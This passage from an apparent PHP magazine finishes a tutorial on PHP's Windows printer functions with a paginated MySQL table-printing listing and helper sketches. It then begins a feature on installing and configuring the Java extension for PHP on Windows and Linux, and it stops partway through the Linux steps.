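The second part of the listing divides the printer resolution by 300 and multiplies every size and coordinate by the result. This suggests that the layout was designed for a 300 DPI printer and is rescaled for any other resolution, although that reading is an assumption. The arithmetic can be sketched on its own, without a printer; scale_dots() is a hypothetical helper and not part of the printer extension.

```php
<?php
// Hypothetical helper: convert a measurement designed for $designDpi
// (300 in the listing, by assumption) into dots on the actual printer.
function scale_dots($designDots, $printerDpi, $designDpi = 300)
{
    return (int) round($designDots * $printerDpi / $designDpi);
}

// A title placed at x = 50 in the 300 DPI layout:
echo scale_dots(50, 300), "\n";  // 50  (unchanged on a 300 DPI printer)
echo scale_dots(50, 600), "\n";  // 100 (twice as many dots at 600 DPI)
echo scale_dots(140, 150), "\n"; // 70  (a 140-dot font height at 150 DPI)
```

Rounding to an integer is a design choice made here because the drawing functions take integer coordinates; the listing itself passes the unrounded products.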
sends data directly to the printer, not to the printer spooler. Finally, we close the document and the connection to the printer. That was very simple, wasn't it? We had to write only eight lines of code to print our order information! What we did here can only be used to print plain text, though, and we've had to set each line end manually (even if the line was empty). To print nicely formatted text, images, and drawings we must use the more complex printer functions.

Complex printer functions
An important difference to remember is that to print formatted text or images we have to use coordinates and always open and close each page of the document. If we want to print text using fonts, we must create them. Once the fonts are created, we can select them in turn and write out the text for that font.

mixed printer_create_font (string face, int height, int width, int font_weight, bool italic, bool underline, bool strikeout, int orientation)

This function creates a font and returns a font handle. This function is very important, so we'd better analyze it in depth. Here's a list of its parameters and what they mean.

• string face: the name of the font, like “Arial”, “Times New Roman”, etc.
• int height: font height in dots.
• int width: font width in dots.
• int font_weight: font weight. We can use these constants to indicate the font weight:
    • PRINTER_FW_THIN: thin (100)
    • PRINTER_FW_ULTRALIGHT: ultra light (200)
    • PRINTER_FW_LIGHT: light (300)
    • PRINTER_FW_NORMAL: normal (400)
    • PRINTER_FW_MEDIUM: medium (500)
    • PRINTER_FW_BOLD: bold (700)
    • PRINTER_FW_ULTRABOLD: ultra bold (800)
    • PRINTER_FW_HEAVY: heavy (900)
• bool italic, bool underline, bool strikeout: use TRUE or FALSE to set each of these attributes.
• int orientation: the rotation of the text. Normal text has orientation = 0. Remember that the angle in degrees has to be multiplied by 10, so to print text rotated by 90° you must set orientation to 900. Signed integers can be used, too – positive integers to rotate left, negative ones to rotate right.

void printer_select_font (resource printer_handle, resource font_handle)
This function selects a font. We must create the font first, using printer_create_font(), and when we start a new page we have to select the font again.

bool printer_delete_font (resource handle)

This function deletes a font.

void printer_draw_text (resource printer_handle, string text, int x, int y)

This function writes the text to the printer spooler. This is the equivalent of printer_write(), but works with formatted text. The variables x and y are the coordinates, in dots, where the line will start. We can't use “\r\n” or other special characters to write a newline anymore. We must write each line separately, changing its coordinates.

void printer_draw_bmp (resource handle, string filename, int x, int y)

This function draws an image at position x, y. The image must be a bitmap, but we can easily convert a JPEG to BMP using the GD library. To use absolute paths, we must specify them in Windows format. A valid absolute path is "c:\\folder\\image.bmp".

Setting up drawing tools
We may need to draw lines (e.g. to print a table), geometric shapes or pie graphs. Doing this isn't so different from formatting text. First, we must create some pens and brushes (instead of fonts) to draw and fill drawings with color. Then we can select the ones we need in turn, and draw lines, rectangles or ellipses, using x and y coordinates.

mixed printer_create_pen (int style, int width, string color)
This function creates a pen that we can use to draw lines or curves, and returns a handle to it. The width parameter specifies the width of the line, color specifies the color in RGB hex format (e.g. “0000FF”) and style must be one of the following constants:

• PRINTER_PEN_SOLID: solid pen
• PRINTER_PEN_DASH: dashed pen
• PRINTER_PEN_DOT: dotted pen
• PRINTER_PEN_DASHDOT: pen with dashes and dots
• PRINTER_PEN_DASHDOTDOT: pen with dashes and double dots
• PRINTER_PEN_INVISIBLE: invisible pen

mixed printer_create_brush (int style, string color)
This function creates a brush that we can use to fill drawings with colors or images, and returns a handle to it. The color parameter specifies the color in RGB hex format. The style parameter must be one of the following constants: • PRINTER_BRUSH_SOLID: brush with a solid color • PRINTER_BRUSH_DIAGONAL: brush with a 45-degree upward left-to-right hatch ( /) • PRINTER_BRUSH_CROSS: brush with a cross hatch ( + ) • PRINTER_BRUSH_DIAGCROSS: brush with a 45-degree cross hatch ( x ) • PRINTER_BRUSH_FDIAGONAL: brush with a 45-degree downward left-toright hatch ( \ ) • PRINTER_BRUSH_HORIZONTAL: brush with a horizontal hatch ( – ) • PRINTER_BRUSH_VERTICAL: brush with a vertical hatch ( | ) • PRINTER_BRUSH_CUSTOM: custom brush from an BMP file. The second parameter is used to specify the BMP instead of the RGB color code.
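Both creation functions take their color as a six-digit RGB hex string. As a minimal sketch, assuming a reasonably modern PHP (type declarations) and a helper name, rgbToHex(), that is purely hypothetical and not part of the printer extension, such a string can be built from numeric components like this:

```php
<?php
// Hypothetical helper (not part of the printer extension): builds the
// six-digit RGB hex string that the color parameter expects.
function rgbToHex(int $red, int $green, int $blue): string
{
    foreach ([$red, $green, $blue] as $component) {
        if ($component < 0 || $component > 255) {
            throw new InvalidArgumentException('Each component must be in 0..255');
        }
    }
    // %02X prints each component as two uppercase hex digits.
    return sprintf('%02X%02X%02X', $red, $green, $blue);
}

$blue = rgbToHex(0, 0, 255); // the "0000FF" example value used in the text
```

The resulting string could then be passed as the color argument of printer_create_pen() or printer_create_brush().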
The printer_delete_pen() and printer_delete_brush() functions delete a pen or a brush.

Using drawing tools

Here are some of the drawing functions we can use after we've created and selected a pen and a brush. Note that we don't need a brush to draw lines.

void printer_draw_line (resource printer_handle, int from_x, int from_y, int to_x, int to_y)

This function draws a line from (from_x, from_y) to (to_x, to_y).

void printer_draw_rectangle (resource handle, int ul_x, int ul_y, int lr_x, int lr_y)

This function draws a rectangle. The ul_x and ul_y parameters are the upper-left coordinates of the rectangle, while lr_x and lr_y are the lower-right ones.

void printer_draw_ellipse (resource handle, int ul_x, int ul_y, int lr_x, int lr_y)

This function draws an ellipse. As with printer_draw_rectangle(), the ul_x, ul_y, lr_x and lr_y parameters are the upper-left and lower-right coordinates of the bounding rectangle.

void printer_draw_pie (resource handle, int rec_x, int rec_y, int rec_x1, int rec_y1, int rad1_x, int rad1_y, int rad2_x, int rad2_y)

This function draws a pie. The rec_x, rec_y, rec_x1 and rec_y1 parameters are the upper-left and lower-right coordinates of the bounding rectangle. The rad1_x and rad1_y parameters are the coordinates of the end of the first radial; rad2_x and rad2_y are the coordinates of the end of the second one.

A complex application: Dumping data from a DB table

In this example, we need to print a hard-copy backup of some important data contained in a database table. We won't print it as plain text, because our customer prefers cool, formatted text. I call this a *complex* application only because it uses the more complex printer functions. We'll create an application which:
• extracts data from the table (we'll use a MySQL DB);
• prints a colored title on an A4 sheet;
• prints a table header and the data we've extracted from the table;
• automatically prints new pages if needed and repeats the table header.

The table is named products, contains 400 records and has the following structure:

CREATE TABLE products (
  id smallint(3) unsigned NOT NULL PRIMARY KEY auto_increment,
  prodname varchar(60) NOT NULL,
  prodid varchar(10) NOT NULL,
  price float NOT NULL,
  qty tinyint(3) unsigned NOT NULL
);
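To get a feel for the paging requirement, here is a rough estimate of how many pages 400 records need. It is only a sketch: the function name is hypothetical, and the layout figures are assumptions borrowed from the walkthrough of Listing 2 (at the 300 DPI reference, a 3200-dot page, 80-dot rows, and a table that starts 400 dots from the top on the first page and 50 dots on the others).

```php
<?php
// Hypothetical estimate of the page count; mirrors the page-break test
// used in the listing ($y_pos >= 3200 after each row has been written).
function estimatePages(
    int $records,
    int $pageHeight = 3200,
    int $rowHeight = 80,
    int $firstTop = 400,
    int $otherTop = 50
): int {
    $pages = 1;
    $y = $firstTop + $rowHeight;         // the header row takes the first slot
    for ($i = 0; $i < $records; $i++) {
        $y += $rowHeight;                // one data row written
        if ($y >= $pageHeight) {         // end of page reached
            $pages++;                    // a new page is started at once
            $y = $otherTop + $rowHeight; // repeated header on the new page
        }
    }
    return $pages;
}

echo estimatePages(400), "\n";
```

With these assumptions the first page holds 34 rows and each later page 39, which agrees with the 11 pages the article reports for 400 records. Because a new page is opened as soon as a page fills up, a row count that exactly fills a page yields one extra page containing only the header.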
Here is a description of each field of the table:

• id: a progressive integer.
• prodname: the name of the product.
• prodid: an alphanumeric string which identifies the product.
• price: the price of the product.
• qty: the quantity available.

The data contained in this table was inserted by repeating the following query 400 times (using a for loop):

INSERT INTO products VALUES ( '', 'Here is the name of the product. It can be 60 chars long.', 'ABC-1234-X', '149.99', '6' );

Taking a look at Listing 2, we first extract the data from the table, ordered by id, and store the result handle in the $res var. We will later use mysql_fetch_array() to obtain each record. Next, we connect to the printer, open a new document and a new page, and get the printer resolution. We need the printer resolution so that we can use the same application with different printers and resolutions, but still draw everything at the same physical size. Coordinates and font sizes are in dots, which may be of vastly different size on different printers. When building our pages, we'll assume our printer has a 300 DPI resolution, which means that we must multiply each value we set by (real X or Y resolution / 300) to scale it properly. This ratio is stored in the $x and $y vars. We'll also assume that the printable area of an A4 sheet is about 2200x3200 dots at 300 DPI.

Now we create some fonts and a pen. We'll use the pen to draw a table, $bigtitle and $smalltitle to write the page titles, and $font to write the text contained in the table. We set the pen width to '1', rather than '1*$x', because in this case maintaining the resolution ratio is not so important.

Moving on to the drawing, we first have to draw the bigger title, so we set PRINTER_TEXT_COLOR and select the $bigtitle font. We can now draw the title at the top of the page. After we've drawn that, we can delete the font and set the text color to black. Now we can select the $smalltitle font, draw the second title, and delete the font.

Before drawing the table, let's think about its size. We can find each column's width using this formula:

column width = (maximum number of characters × average character width) + 2 × horizontal cell padding
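The sizing arithmetic can be sketched in a few lines of PHP. This is an illustration rather than part of Listing 2: the function names are hypothetical, the 20-dot average character width and 20-dot padding are the figures the article uses, and the character count of 7 for the price column is an assumption chosen to match the "about 180 dots" quoted for it.

```php
<?php
// Scale factor for one axis: real printer resolution over the 300 DPI reference.
function scaleFactor(int $realDpi, int $referenceDpi = 300): float
{
    return $realDpi / $referenceDpi;
}

// Width of one column in dots at the reference resolution:
// characters * average character width + left and right padding.
function columnWidth(int $maxChars, int $avgCharWidth = 20, int $padding = 20): int
{
    return $maxChars * $avgCharWidth + 2 * $padding;
}

// Maximum characters per column (7 for price is an assumption).
$chars  = ['id' => 3, 'prodname' => 60, 'prodid' => 10, 'price' => 7, 'qty' => 3];
$widths = array_map('columnWidth', $chars);

// Column border positions, starting 200 dots from the left edge.
$borders = [200];
foreach ($widths as $width) {
    $borders[] = end($borders) + $width;
}

$x = scaleFactor(600);        // e.g. a 600 DPI printer
$scaled = array_map(function ($pos) use ($x) { return $pos * $x; }, $borders);
```

Under these assumptions the widths add up to 1860 dots and the border positions come out as 200, 300, 1540, 1780, 1960 and 2060, the same values the listing stores in $x_pos before scaling.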
We should also add the border width, but in this case we've set it to one dot, so we can ignore it. Note that we multiply the character width by 4/3 because uppercase characters are wider. This means that the real average character width will be 4/3*15 = 20 dots (15 is the width we set the font to in printer_create_font()). We'll set the horizontal cell padding to 20 dots. The first column of our table contains a 3-digit integer, so its width must be 20*3+20*2 = 100 dots (three characters plus the left and right cell paddings). The second column ("product name") can contain 60 characters, so its width will have to be 1240 dots. The "product id" column will take 240 dots, the "price" column about 180 dots, and the last column 100 dots. This means that each row must be 1860 dots wide and about 80 dots high (the height of our font was specified as 45 dots, plus the top and bottom cell paddings). The upper-left coordinates of the table will be (200, 400), the upper-right ones (2060, 400). The Y position of the next row border will be 400+80 = 480. The Y position of the text inside a row equals the border Y position plus the vertical cell padding: for the first row it will be 400+15 = 415, for the second one 480+15 = 495, and so on.

Listing 2 (continued)

    printer_select_pen($handle, $pen);    // Selects $pen
    printer_select_font($handle, $font);  // And $font

    $x_pos = array (200*$x,   // X positions of each column border;
                    300*$x,   // we'll use them to draw table borders.
                    1540*$x,
                    1780*$x,
                    1960*$x,
                    2060*$x);
    $x_txt = array (220*$x,   // X positions of the text in each column;
                    320*$x,   // we'll use them to write text inside table cells.
                    1560*$x,
                    1800*$x,
                    1980*$x);
    $y_pos = 400*$y;          // Sets Y position
    $y_txt = $y_pos + 15*$y;  // Sets Y text position
    $page = 1;                // Sets page number

    /* Writes the header of the table */
    printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos);
    printer_draw_text($handle, "ID", $x_txt[0], $y_txt);
    printer_draw_text($handle, "PRODUCT NAME / DESCRIPTION", $x_txt[1], $y_txt);
    printer_draw_text($handle, "PROD. ID", $x_txt[2], $y_txt);
    printer_draw_text($handle, "PRICE", $x_txt[3], $y_txt);
    printer_draw_text($handle, "QTY", $x_txt[4], $y_txt);
    $y_pos += 80*$y;          // Increments $y_pos
    $y_txt = $y_pos + 15*$y;  // Resets Y text position

    /* Writes one row per record (the start of this loop is reconstructed
       from the description in the text) */
    while ($row = mysql_fetch_array($res))
    {
        printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos);
        printer_draw_text($handle, $row['id'], $x_txt[0], $y_txt);
        printer_draw_text($handle, $row['prodname'], $x_txt[1], $y_txt);
        printer_draw_text($handle, $row['prodid'], $x_txt[2], $y_txt);
        printer_draw_text($handle, $row['price'], $x_txt[3], $y_txt);
        printer_draw_text($handle, $row['qty'], $x_txt[4], $y_txt);

        $y_pos += 80*$y;          // Increments $y_pos
        $y_txt = $y_pos + 15*$y;  // Resets Y text position

        if ($y_pos >= 3200*$y)    // If it reaches the end of the page
        {
            printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos); // Closes the table
            printer_draw_text($handle, "Page $page", 2080*$x, 40*$y);         // Writes page number

            // On the 1st page vertical lines start from 400, else from 50
            $y_start = ($page == 1) ? 400*$y : 50*$y;

            /* Draws vertical lines */
            printer_draw_line($handle, $x_pos[0], $y_start, $x_pos[0], $y_pos);
            printer_draw_line($handle, $x_pos[1], $y_start, $x_pos[1], $y_pos);
            printer_draw_line($handle, $x_pos[2], $y_start, $x_pos[2], $y_pos);
            printer_draw_line($handle, $x_pos[3], $y_start, $x_pos[3], $y_pos);
            printer_draw_line($handle, $x_pos[4], $y_start, $x_pos[4], $y_pos);
            printer_draw_line($handle, $x_pos[5], $y_start, $x_pos[5], $y_pos);

            printer_end_page($handle);            // Closes this page
            printer_start_page($handle);          // And starts a new one
            printer_select_font($handle, $font);  // Re-selects $font
            $y_pos = 50*$y;                       // Resets $y_pos
            $y_txt = $y_pos + 15*$y;              // And Y text position
            $page++;                              // Increments page number

            /* Writes the header of the table in the new page */
            printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos);
            printer_draw_text($handle, "ID", $x_txt[0], $y_txt);
            printer_draw_text($handle, "PRODUCT NAME / DESCRIPTION", $x_txt[1], $y_txt);
            printer_draw_text($handle, "PROD. ID", $x_txt[2], $y_txt);
            printer_draw_text($handle, "PRICE", $x_txt[3], $y_txt);
            printer_draw_text($handle, "QTY", $x_txt[4], $y_txt);
            $y_pos += 80*$y;          // Increments $y_pos
            $y_txt = $y_pos + 15*$y;  // Resets Y text position
        }
    }

    /* When it exits the while loop */
    printer_draw_line($handle, $x_pos[0], $y_pos, $x_pos[5], $y_pos); // Closes the table
    printer_draw_text($handle, "Page $page", 2080*$x, 40*$y);         // Writes page number

    // If the document has only one page vertical lines start from 400, else from 50
    $y_start = ($page == 1) ? 400*$y : 50*$y;

    /* Draws vertical lines */
    printer_draw_line($handle, $x_pos[0], $y_start, $x_pos[0], $y_pos);
    printer_draw_line($handle, $x_pos[1], $y_start, $x_pos[1], $y_pos);
    printer_draw_line($handle, $x_pos[2], $y_start, $x_pos[2], $y_pos);
    printer_draw_line($handle, $x_pos[3], $y_start, $x_pos[3], $y_pos);
    printer_draw_line($handle, $x_pos[4], $y_start, $x_pos[4], $y_pos);
    printer_draw_line($handle, $x_pos[5], $y_start, $x_pos[5], $y_pos);

    printer_delete_pen($pen);    // Deletes $pen
    printer_delete_font($font);  // And $font
    printer_end_page($handle);   // Closes the last page
    printer_end_doc($handle);    // Closes the document
    printer_close($handle);      // Closes the connection
    ?>

Now let's read the rest of Listing 2. We first select $pen and $font, then set some vars. In the $x_pos array we store the X positions of the table borders, multiplied by $x to preserve the scale. We'll use it to draw the table borders (vertical and horizontal lines). The $x_txt array contains the X position of the text in each column, equal to the left border X position plus the horizontal cell padding. We'll use this array every time we need to write text inside the table. We use $y_pos to set the Y coordinate where the table border starts. On the first page, as we said, its value is 400 dots (at 300 DPI). $y_txt is the Y text position, obtained by adding 15 dots to the border position; its first value is 415 dots. $page is the page number.

Now we can write the table header: we draw a horizontal line at $y_pos (400 dots from the top) from $x_pos[0] (200 dots from the left) to $x_pos[5] (2060 dots from the left). Next, we write the header of each column at $y_txt (415 dots from the top), using the X values stored in the $x_txt array. Finally we increment $y_pos by 80 dots (it becomes 480 dots) and reset $y_txt to 480+15 = 495 dots: now we're ready to write a new data row.

To write the following rows, we repeat these operations in a while loop (we need it to fetch the MySQL results): first draw the horizontal line, then write the text, and finally increment $y_pos and reset $y_txt. But before writing the next line we must check whether we have reached the end of the page. This is the job of the if statement: if the Y position of the new line has reached 3200 dots (the vertical size of the page), we perform some extra operations. We close the table by drawing the last horizontal line at $y_pos and write the page number in the top-right corner of the page. Next, we check $page (the page number) to find out whether this is the first page: on the first page the table starts 400 dots from the top (because of the titles), and on the others it starts at 50 dots. We store the top Y coordinate (400 or 50 dots) in $y_start and use it to draw the vertical lines: each line starts at $y_start (the top of the table) and ends at $y_pos (the bottom of the table); its X position is stored in the $x_pos array. Note that we could simply draw each row separately, including its vertical lines, but that would take a lot of time: PHP would have to draw hundreds of short vertical lines instead of six long ones!

Now we close the page and open a new one. Remember that we must re-select the font each time we start a new page! We set $y_pos to 50 dots, reset $y_txt to 65 dots (50+15) and increment $page. Now we can write the table header again, repeating exactly the operations we performed to draw it the first time. Finally we increment $y_pos again and reset $y_txt.

PHP goes on executing the while loop until there is no more MySQL data to fetch. When it exits the loop, we must end the document: we close the table and write the page number, just as we did at the end of each page. We must check the page number before drawing the vertical lines because the whole document may have only one page (again, to take the titles into account). Lastly, we delete $pen and $font, and close the page, the document and the printer connection.

The whole application can be relatively slow. To create a 400-record document (11 pages) and send it to the printer spooler, PHP took about 2.9 seconds. That isn't overly long, and is much less than the default maximum execution time (usually 30 seconds). Of course the printer will need longer to print, but that doesn't depend on PHP.

Conclusions

We have just used PHP to print data as plain text and as colored, formatted text. In my experience, a simple printer script that is part of a bigger PHP application can increase the whole application's value and, obviously, its price. I hope that you are now able to use the printer functions and take advantage of their great potential.
If you need any more info, although I hope this article has been exhaustive, you can take a look at the PHP on-line manual (though it treats this topic quite superficially) or contact me by e-mail.
About the Author
Alessandro Sfondrini is a young Italian PHP programmer from Como. He has already written some on-line PHP tutorials and published scripts on most important Italian web portals. You can contact him at [email protected].
Discuss this article: http://forums.phparch.com/48
Installing Java for PHP
F E A T U R E
by Dave Palmer
"I hate this *#$%ing Java #@!&!" you scream out in desperation, as you clench your fists into tight knots and the cold sweat pours down your brow like some lunatic drug addict; your heart pounds like a jackhammer getting ready to burst through your chest cavity as you begin to weep uncontrollably, falling into the fetal position under your desk.

Relax dude, you just need to get it configured right, that's all. Here, maybe I can help. I have spent a great deal of time (and some effort) showing you, our most faithful readers, how Java and PHP can work together in harmony, making your applications pull off what appears to be the impossible (or at least the mildly difficult). But, in my haste and negligence, I have left you hanging on how to actually get PHP talking to the JVM (Java Virtual Machine). It is my intention to use this piece to shed some light on the often painful process of configuring PHP so that you can invoke Java classes. Windows users probably haven't had the same trouble that some of our Linux brethren have come across because, oddly enough, configuring PHP to work with a JVM on Windows is not as troublesome as it can be for our open-source compadres. I will break this article up into two pieces, one slice for the Windows user and the other for the Linux user; that way, if you are interested in only one of them, you can spare yourself the tedium of going through something that does not interest you. Pretty sweet, eh?

Windows Configuration

Since this is the easier task, I'll get it over with first. Note that I don't mean to minimize the job of configuring PHP for Java on Windows, as it isn't as simple as other PHP configuration tasks. Let's dig into this, shall we? The first thing you need is a working version of the JDK (Java Development Kit) or JRE (Java Runtime Environment). For the sake of simplicity and consistency, I highly recommend you use Sun's JDK for this exercise. I use this vendor's JDK regularly and have had much success in configuring PHP with it. It is also important to note that you should be using version 1.3.x of the JDK. I know it's tempting to go with the latest and greatest version of everything, but 1.3.x is the safest bet right now. So, point your browser to this URL:

http://java.sun.com/j2se/1.3/download.htm

Select the Windows (all languages) SDK version. Once you have downloaded the file (it isn't terribly small), run the executable. It will step you through the installation of the JDK and ask you where you want to install it. I would recommend installing it in:

C:\jdk1.3
It's important NOT to install this in a folder that has spaces in its name, and simply installing it off the root makes for less typing in the php.ini file. Once everything has been installed, confirm that everything is set up properly. Open up a command prompt and type this command:

C:\>java -version

You should see something like this:

java version "1.3.1_07"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.3.1_07-b02)
Java HotSpot(TM) Client VM (build 1.3.1_07-b02, mixed mode)

If you see something other than that, make sure that c:\jdk1.3\bin is in your PATH environment variable. Before we move on, I'd like to go quickly over some of the components that are packaged with Java. This is a good idea because the better you understand Java, the easier it will be for you to troubleshoot any problems you may have. First, navigate to:

C:\jdk1.3\bin

You'll see a lot of stuff in here. The most important things are these three files:

javac.exe
java.exe
jar.exe

javac.exe is the Java compiler. This program converts your Java source code into Java byte code (a .class file). java.exe is the virtual machine executable that interprets the .class files into machine code, and performs whatever actions you designed your program to perform. jar.exe is a very handy utility for creating JAR archive files. JAR files are essentially ZIP files, but are used to package Java classes together. This means that if you are distributing a Java application, which may contain any number of class files, properties files and other resources, you can package them into one archive file. The Java Virtual Machine can read the contents of a JAR file (or ZIP file) once you add the JAR file to your class path. The next place to go snooping around is:

C:\jdk1.3\jre\bin

You'll notice three folders:

Classic
Hotspot
Server

Each contains the same files (with some differences that are beyond the scope of this article). For the sake of this article, we'll be dealing with the "Classic" location. In this folder you'll notice this file:

jvm.dll
This is the actual JVM (Java Virtual Machine) object that does all of the heavy lifting when you execute a Java program.

The Class Path

One more topic needs to be addressed before we get into the actual configuration: the class path. This is probably the most confusing and frustrating aspect of Java development. But the firmer your grasp of the class path and the ramifications of establishing one, the more comfortable you will feel with Java. Java is a runtime language, meaning its dependent classes and libraries are "loaded" at runtime. Because of Java's runtime nature, making sure Java knows where to find important things like classes, resources and properties files can be a bit daunting. Java uses the class path to find classes, resources, and properties. Because of the flexibility of the JVM, the class path can be defined in a number of different ways. It is often defined as an environment variable that the JVM and the Java compiler can read at runtime. The Java compiler needs to be aware of the class path because if the program you are compiling has external dependencies (such as a third-party JAR file), the compiler needs to know where this JAR file is so that it can compile your source. With Java, this loose coupling is used just so that the compiler can be aware of the data types, method signatures, and other runtime-oriented properties of your dependencies. Another method, and the one I tend to prefer, is to define the class path as an argument when calling the Java compiler or the JVM. Here's a simple example of setting up a class path:

javac -classpath c:\path\to\file.jar MySourceCode.java
What this command essentially says is that we want to compile (note the use of javac) the source code contained in MySourceCode.java. We also specify the -classpath switch, which tells the compiler that we have dependent "things" stored in "file.jar."
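A class path is just a delimited list of directories and JAR files. Java separates the entries with a semi-colon on Windows and a colon on Linux, which happens to be what PHP exposes as PATH_SEPARATOR. As a small illustration (the helper name buildClassPath() is hypothetical), the list can be assembled like this:

```php
<?php
// Hypothetical helper: joins class path entries with the platform separator.
// PATH_SEPARATOR is ";" on Windows and ":" on Unix-like systems, the same
// separators Java expects in a class path.
function buildClassPath(array $entries, string $separator = PATH_SEPARATOR): string
{
    // Trim whitespace and drop empty entries before joining.
    $clean = array_filter(array_map('trim', $entries), 'strlen');
    return implode($separator, $clean);
}

// Windows-style example using the JAR path from the javac command above;
// the second entry is an assumed directory of loose .class files.
echo buildClassPath(['c:\path\to\file.jar', 'c:\classes'], ';'), "\n";
```

The same string could be handed to javac or java through the -classpath switch.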
Configuring PHP

Okay, on to our PHP configuration. The first thing we want to do is open up the php.ini file in your text editor of choice. PHP/Java integration is done through an extension that is shipped with all new versions of PHP for Windows. Just to confirm you have the extension, navigate to:

C:\[php installation]\extensions

and make sure you have the php_java.dll file in this directory. Scroll down in your php.ini file and find the extensions section. You'll notice this line:

;extension=php_java.dll

Go ahead and uncomment this line (remove the ';' from in front of the word "extension"). You should now have something like this:

extension=php_java.dll

Next, scroll down to the Java section in the php.ini file. You'll notice there are four directives for Java's configuration:

java.class.path
java.home
java.library
java.library.path

Each of these directives needs to be configured correctly or PHP will not know how to invoke any of your Java classes. We'll take them in order, one by one.

java.class.path is the directive that tells the JVM what our dependencies are. There is one required dependency that MUST be specified here, and that is the php_java.jar file that came with PHP. If you do not have this JAR file in the java.class.path, Java integration will not work. My php_java.jar file is in my 'extensions' directory under my PHP install directory, so my java.class.path contains the full path to php_java.jar in that directory.

As we start adding our own custom Java classes, we'll need to append the locations of our JAR files, or the paths to where our class files live, to the java.class.path directive. To append to the java.class.path, simply add a semi-colon (;) followed by the full path to where your dependency lives. Don't be afraid if the class path starts getting long; it happens.

Moving right along to java.home, this directive lets PHP know where your JDK is installed (or JRE; the JDK is the JRE plus all of the developer tools). Using the example above (when installing the JDK), the java.home directive looks like this:

java.home=c:\jdk1.3

That was pretty easy, eh? Next up is the java.library directive. Here's where it starts getting interesting. The PHP/Java extension simply provides "hooks" so that the PHP engine can utilize the JVM, but in order for the extension to do its job completely we need to tell PHP where the JVM lives. This confuses a lot of folks, who think that they just need to point this at java.exe; but java.exe is really nothing more than a wrapper for the JVM and is therefore not the correct choice. What we need to do here is point this directive at the JVM DLL I mentioned earlier:

java.library=c:\jdk1.3\jre\bin\Classic\jvm.dll

If, for any reason, your machine refuses to play nicely with this JVM, try changing "Classic" to either "Server" or "HotSpot."

The last directive is java.library.path, which I have a problem with. First, it seems redundant to me, although I can see some of the logic behind it. The name itself is a bit meaningless to those not embroiled in the deep ether-world of Java development. Essentially this directive lets PHP know where php_java.dll lives, so that the location can be fed to the JVM in the form of a -D switch (which sets a Java system property). I won't go into the nitty-gritty details regarding JNI, but this setting causes a great deal of confusion, while it's really quite simple. Just
point this directive to the LOCATION where php_java.dll lives:

java.library.path=c:\[php install]\extensions

There, everything should be set! If you are running Apache, give her a restart (so that the Apache module is reloaded, picking up your changes to php.ini). If you are using IIS, you'll need to restart that instead. The next step is to test our configuration with a simple test script, shown in Listing 1.

Listing 1

    <?php
    $system = new Java("java.lang.System");
    $currentTime = $system->currentTimeMillis();
    echo "The current time in milliseconds since epoch is: " . $currentTime;
    ?>

You should see output like:

The current time in milliseconds since epoch is: 1054742366703

If you see anything else, such as an error, then chances are there is something wrong with your configuration. I would highly recommend double-checking the locations set in java.home, java.library and java.library.path.

Linux Configuration

If you do a simple Google search on configuring Java integration with PHP on the Linux platform, you will be inundated with page after page of results, all pointing to tiny tidbits of the information you need in order to get this darn thing to work! What I have (hopefully) done here is consolidate this information into one place, where you can (again, hopefully) get up and running (relatively) quickly. The first thing you'll need is a Linux version of the Sun Java JDK (Java Development Kit). Go to http://java.sun.com/j2se/1.3/download.html and select either the RPM or the self-extracting version of the JDK. I prefer the self-extracting script, and for the sake of this article I'm going to assume you downloaded this version. Once the download is complete, you need to chmod 777 the file you downloaded:

chmod 777 j2sdk-1_3_1_07-linux-i586.bin

Now you'll need to execute this file from the directory you downloaded it to. You will then be stepped through the process of unpacking the JDK components (and asked to sign away your life via the license agreement). You will be left with a directory (in the place where you executed the script) with a name like:

jdk1.3.1_07

Now, su to root and create a directory in a common place. I generally like:

/usr/java1.3

Of course you can do what suits you, but, for this article, I will do as I please. You can follow along as my minion, simply asking how high when I command ye to jump! Once you have created your directory, copy the contents of the unpacked directory (recursively) to this new directory. There, that's it. Java is now installed. You may want to export your PATH variable to include:

/usr/java1.3/bin

or not; it's completely up to you. Before going on, let's test our installation to make sure everything is okay. First, cd to the 'bin' directory:

cd /usr/java1.3/bin

Then type this command:

java -version

You should see something like this:

java version "1.3.1_07"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.3.1_06-b01)
Java HotSpot(TM) Client VM (build 1.3.1_06-b01, mixed mode)

If you see something else, like an error, then your libc libraries or other system libraries may be out of date. Now that we have confirmed that Java is installed, indulge me for a moment while I explain some important files you'll find in your JDK. In the 'bin' directory you'll notice these three files:

java
javac
jar

• java: this is the executable file that invokes the JVM (Java Virtual Machine) and executes your class file (translates your byte code into machine code).
• javac: this is the Java compiler. You need this to compile Java source code into Java class files (byte code).
• jar: this is Java's archive and packaging tool. A JAR file is nothing more than a ZIP file, but has special significance for Java in that classes can be packaged into a single file, and the Java compiler (javac) and the Java executor (java) can read the contents of JAR files.

There is one more location to visit. Let's take a look at the actual JVM objects:

cd /usr/java1.3/jre/lib/i386/classic
You'll notice this file:

libjvm.so

This is the actual shared object file that contains the JVM. There are other "flavors" of the JVM, located in the 'i386' directory, but we'll just pay attention to the "classic" flavor for now. With the dime tour complete, we can now get on with configuring PHP. First, I must say that I am using RedHat 8.0 and, because I like things the way I like them, I have my own installations (meaning I don't use the default RPM installations) of PHP, Apache and damn near everything else. So the locations I refer to may not be applicable to your system. First, we need to make sure we compiled PHP to include Java support. I know just how much pure joy it is to re-configure and then re-make PHP, which is why I always create a "configure" script that contains all of my configure directives. You'll need to make sure you included:

--with-java=/usr/java1.3

Run configure (remember to rm -rf config.cache), then do:

make
make install

Once PHP has been successfully recompiled and re-installed, we can do the actual configuration. Before going on, I must warn you, my dear reader, that there are some things that won't make sense, but please, just do them, and don't ask questions. You'll be better off. Trust me. The first thing we need to do is make sure our
java.so extension (this is the extension PHP will load) is in our extensions directory. So, 'cd' to your extensions directory (specified in your php.ini file). You should see:

java.so

If you do, good. Now, here's some weirdness I have found. We must rename this file to:

libphp_java.so

